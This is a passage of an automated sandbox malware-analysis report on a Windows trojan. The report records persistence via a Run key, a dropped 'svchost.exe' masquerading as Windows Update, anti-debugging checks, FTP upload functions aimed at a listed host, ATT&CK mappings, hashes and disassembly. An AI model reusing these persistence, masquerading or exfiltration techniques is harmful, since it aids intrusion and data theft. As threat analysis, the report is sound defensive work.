_00672687
Source: C:\Users\user\AppData\Local\windows update\svchost.exeCode function: 4_2_006724F0 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,sprintf,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,FindFirstFileA,FindNextFileA,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,FindFirstFileA,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,FindNextFileA,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,?4_2_006724F0
Source: C:\Users\user\AppData\Local\windows update\svchost.exeCode function: 4_2_006725B9 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,FindFirstFileA,FindNextFileA,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,FindFirstFileA,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,FindNextFileA,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??0?$bas4_2_006725B9
Source: C:\Users\user\AppData\Local\windows update\svchost.exeCode function: 4_2_00672687 ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,FindFirstFileA,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,FindNextFileA,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,FindNextFileA,FindNextFileA,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,sprintf,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,FtpCreateDirectoryA,FtpCreateDirectoryA,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@s4_2_00672687
Source: svchost.exe, 00000004.00000002.2839712853.0000000000E47000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll)6qcu
Source: svchost.exe, 00000006.00000002.2839762127.0000000000E41000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllT'
Source: svchost.exe, 00000001.00000002.2839691268.0000000000A48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8R
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7704.21109.exeCode function: 0_2_00921A0C IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,0_2_00921A0C
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7704.21109.exeCode function: 0_2_00921A0C IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,0_2_00921A0C
Source: C:\Users\user\AppData\Local\windows update\svchost.exeCode function: 1_2_006752E0 SetUnhandledExceptionFilter,1_2_006752E0
Source: C:\Users\user\AppData\Local\windows update\svchost.exeCode function: 1_2_00674BFC IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,1_2_00674BFC
Source: C:\Users\user\AppData\Local\windows update\svchost.exeCode function: 4_2_006752E0 SetUnhandledExceptionFilter,4_2_006752E0
Source: C:\Users\user\AppData\Local\windows update\svchost.exeCode function: 4_2_00674BFC IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,4_2_00674BFC
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7704.21109.exeCode function: 0_2_009221B8 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_009221B8
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7704.21109.exeCode function: 0_2_00921000 LoadStringA,LoadStringA,LoadStringA,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,GetUserNameA,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,sprintf,sprintf,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,CreateDirectoryA,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,sprintf,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,CreateFileA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,sprintf,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,RegCreateKeyA,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,RegSetValueExA,RegCloseKey,WriteFile,CloseHandle,FreeResource,memset,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,CreateProcessA,CreateWindowExA,ShowWindow,KiUserCallbackDispatcher,LoadAcceleratorsA,GetMessageA,KiUserCallbackDispatcher,TranslateAcceleratorA,TranslateAcceleratorA,TranslateMessage,DispatchMessageA,KiUserCallbackDispatcher,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,0_2_00921000
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter
1
Registry Run Keys / Startup Folder
1
Process Injection
11
Masquerading
OS Credential Dumping1
System Time Discovery
Remote Services1
Archive Collected Data
1
Encrypted Channel
1
Exfiltration Over Alternative Protocol
Abuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading
1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS Memory111
Security Software Discovery
Remote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
DLL Side-Loading
1
Obfuscated Files or Information
Security Account Manager1
Account Discovery
SMB/Windows Admin SharesData from Network Shared Drive11
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Software Packing
NTDS1
System Owner/User Discovery
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA Secrets1
File and Directory Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials2
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
SecuriteInfo.com.FileRepMalware.7704.21109.exe61%ReversingLabsWin32.Trojan.MintPorcupine
SecuriteInfo.com.FileRepMalware.7704.21109.exe100%AviraTR/Rogue.8356597.1
SecuriteInfo.com.FileRepMalware.7704.21109.exe100%Joe Sandbox ML
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\windows update\svchost.exe36%ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
ruslyz.ftp.narod.ru
unknown
unknownfalse
    unknown
    No contacted IP infos
    Joe Sandbox version:41.0.0 Charoite
    Analysis ID:1521530
    Start date and time:2024-09-28 22:24:14 +02:00
    Joe Sandbox product:CloudBasic
    Overall analysis duration:0h 5m 18s
    Hypervisor based Inspection enabled:false
    Report type:full
    Cookbook file name:default.jbs
    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
    Number of analysed new started processes analysed:10
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Sample name:SecuriteInfo.com.FileRepMalware.7704.21109.exe
    Detection:MAL
    Classification:mal88.evad.winEXE@5/2@27/0
    EGA Information:
    • Successful, ratio: 100%
    HCA Information:
    • Successful, ratio: 100%
    • Number of executed functions: 20
    • Number of non-executed functions: 36
    Cookbook Comments:
    • Found application associated with file extension: .exe
    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
    • Not all processes where analyzed, report is missing behavior information
    • Report size getting too big, too many NtQueryValueKey calls found.
    • VT rate limit hit for: SecuriteInfo.com.FileRepMalware.7704.21109.exe
    TimeTypeDescription
    16:25:29API Interceptor3x Sleep call for process: svchost.exe modified
    22:25:34AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run windows update "C:\Users\user\AppData\Local\windows update\svchost.exe"
    22:25:42AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run windows update "C:\Users\user\AppData\Local\windows update\svchost.exe"
    No context
    No context
    No context
    No context
    No context
    Process:C:\Users\user\AppData\Local\windows update\svchost.exe
    File Type:data
    Category:dropped
    Size (bytes):114
    Entropy (8bit):4.556139308819468
    Encrypted:false
    SSDEEP:3:3yt2aX7Fa5zu77/hadYTu25p2jeto2iJ0ihFn2fe+uDTs2J:YrFeCFyspHodhF2beTs2J
    MD5:3AD8253DA4332C02D11C1ACB000E5B57
    SHA1:F21B1EFDF17C998D8F88E1DD9C312C188A8FCF65
    SHA-256:D8B769941857748F363213B3E8909D2CE91839D703FB3627A27830E0E4934BC6
    SHA-512:C1E38D9135E7DA672FC0FEED289757F9CC970C394194FD5B7FBE7284608F68C65878742C4AFCB930929D3ABD7098E3F584BBB19AEE6C057FB6D26E0F6E99ED5F
    Malicious:false
    Preview:....x{.SCG .....wz6....{SF .....wz6y....{SG ...y.SKFO ...w...SF ...xSF ..{.....SG .....6.{....w..SF ..{}6.w.~6.S .
    Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7704.21109.exe
    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
    Category:dropped
    Size (bytes):82944
    Entropy (8bit):5.338200236806117
    Encrypted:false
    SSDEEP:768:yl3yUPuX9XicF5ifgpmUUQVY6CZU9qZU9:q3ySs5a8UQcp
    MD5:D759329B5FA8220EFE1161BFF8B9C5EB
    SHA1:56AD7D0BA22F37A32F81959C8226DE6E73F10825
    SHA-256:B55D8D47E4F41025DB34EFE9FFC1781500E82DB56F4A712868EAE8E1B1443B16
    SHA-512:443FE932B92D134223D09DAA588C6D9B194C8DB78EB5583784AA53700480F90E45862C2DC9230786C0A9A3A95F7275A01A71692ED35228619DEB90CB7F4F42D6
    Malicious:true
    Antivirus:
    • Antivirus: ReversingLabs, Detection: 36%
    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b..B...B...B...\QF.F...\Q@.C...\QV.V...\QQ.F...e..K...B.......\Q_.@...\QA.C...\QD.C...RichB...........PE..L....R.P.................N...........P.......`....@.......................................@..................................q..................................8....a...............................k..@............`...............................text....L.......N.................. ..`.rdata.......`... ...R..............@..@.data....2...........r..............@....rsrc................t..............@..@.reloc...............6..............@..B................................................................................................................................................................................................................................................................................................................................
    File type:PE32 executable (GUI) Intel 80386, for MS Windows
    Entropy (8bit):5.128143892143662
    TrID:
    • Win32 Executable (generic) a (10002005/4) 99.96%
    • Generic Win/DOS Executable (2004/3) 0.02%
    • DOS Executable Generic (2002/1) 0.02%
    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
    File name:SecuriteInfo.com.FileRepMalware.7704.21109.exe
    File size:145'408 bytes
    MD5:00a1b2ddc402ca4b20cc5f82f68092e6
    SHA1:fb1e0c07a89b68d0670b2ebf548b6e076eaf8bdb
    SHA256:06707c688782793a9f9e48388edc9439237a860f9e66019272a881a3aa5ea6ab
    SHA512:63c76c695c8733b31c90faad0eb418b92dab9ebfaefc68a654197a25aa9bceab05582c72220ecd8ba73000fb73c8634d9a43f27ae95bba11ad88b28011916d1a
    SSDEEP:768:Hs2t10nBiEI9oSVZU9qZU9ml3yUPuX9XicF5ifgpmUUQVY6CZU9qZU9L:Hs2Huif5Vpv3ySs5a8UQcp
    TLSH:80E38216A6018460F70C0B301A56F9E589AA9D7C16D4F68FF57CBD3A6B3219399F308F
    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........./...A...A...A..L....A..L....A..L....A..L....A...:...A...@...A..L....A..L....A..L....A.Rich..A.................PE..L....i.P...
    Icon Hash:8a80809292808001
    Entrypoint:0x401de2
    Entrypoint Section:.text
    Digitally signed:false
    Imagebase:0x400000
    Subsystem:windows gui
    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
    Time Stamp:0x50A669D6 [Fri Nov 16 16:29:10 2012 UTC]
    TLS Callbacks:
    CLR (.Net) Version:
    OS Version Major:5
    OS Version Minor:0
    File Version Major:5
    File Version Minor:0
    Subsystem Version Major:5
    Subsystem Version Minor:0
    Import Hash:c5589c454a6cc047af7ca179d9606bdd
    Instruction
    call 00007F14F513A0B6h
    jmp 00007F14F5139A1Bh
    mov edi, edi
    push ebp
    mov ebp, esp
    sub esp, 00000328h
    mov dword ptr [00404158h], eax
    mov dword ptr [00404154h], ecx
    mov dword ptr [00404150h], edx
    mov dword ptr [0040414Ch], ebx
    mov dword ptr [00404148h], esi
    mov dword ptr [00404144h], edi
    mov word ptr [00404170h], ss
    mov word ptr [00404164h], cs
    mov word ptr [00404140h], ds
    mov word ptr [0040413Ch], es
    mov word ptr [00404138h], fs
    mov word ptr [00404134h], gs
    pushfd
    pop dword ptr [00404168h]
    mov eax, dword ptr [ebp+00h]
    mov dword ptr [0040415Ch], eax
    mov eax, dword ptr [ebp+04h]
    mov dword ptr [00404160h], eax
    lea eax, dword ptr [ebp+08h]
    mov dword ptr [0040416Ch], eax
    mov eax, dword ptr [ebp-00000320h]
    mov dword ptr [004040A8h], 00010001h
    mov eax, dword ptr [00404160h]
    mov dword ptr [0040405Ch], eax
    mov dword ptr [00404050h], C0000409h
    mov dword ptr [00404054h], 00000001h
    mov eax, dword ptr [00404000h]
    mov dword ptr [ebp-00000328h], eax
    mov eax, dword ptr [00404004h]
    mov dword ptr [ebp-00000324h], eax
    call dword ptr [00000074h]
    Programming Language:
    • [ASM] VS2008 build 21022
    • [ C ] VS2008 build 21022
    • [C++] VS2008 build 21022
    • [IMP] VS2008 build 21022
    • [IMP] VS2005 build 50727
    • [RES] VS2008 build 21022
    • [LNK] VS2008 build 21022
    NameVirtual AddressVirtual Size Is in Section
    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
    IMAGE_DIRECTORY_ENTRY_IMPORT0x353c0x8c.rdata
    IMAGE_DIRECTORY_ENTRY_RESOURCE0x50000x20564.rsrc
    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
    IMAGE_DIRECTORY_ENTRY_BASERELOC0x260000x2d0.reloc
    IMAGE_DIRECTORY_ENTRY_DEBUG0x31e00x1c.rdata
    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x34180x40.rdata
    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
    IMAGE_DIRECTORY_ENTRY_IAT0x30000x1ac.rdata
    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
    .text0x10000x143b0x16007323f04232999f4649732e6bba867177False0.5724431818181818data5.807471830668301IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    .rdata0x30000xfb20x10008e635162e5ef3834e54cf34c6da86afcFalse0.4267578125data5.232529303162572IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
    .data0x40000x6440x2005855efe42e44d1954c24a34a8499e684False0.08984375data0.527214047133102IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
    .rsrc0x50000x205640x206005fafe02f55dff8a20bfd8933ab8a0ab3False0.20199384652509653data5.034904926169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
    .reloc0x260000x4e20x600bd1f72eb7455742a1bd95a2e4704bb22False0.447265625data3.915961824571801IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
    NameRVASizeTypeLanguageCountryZLIB Complexity
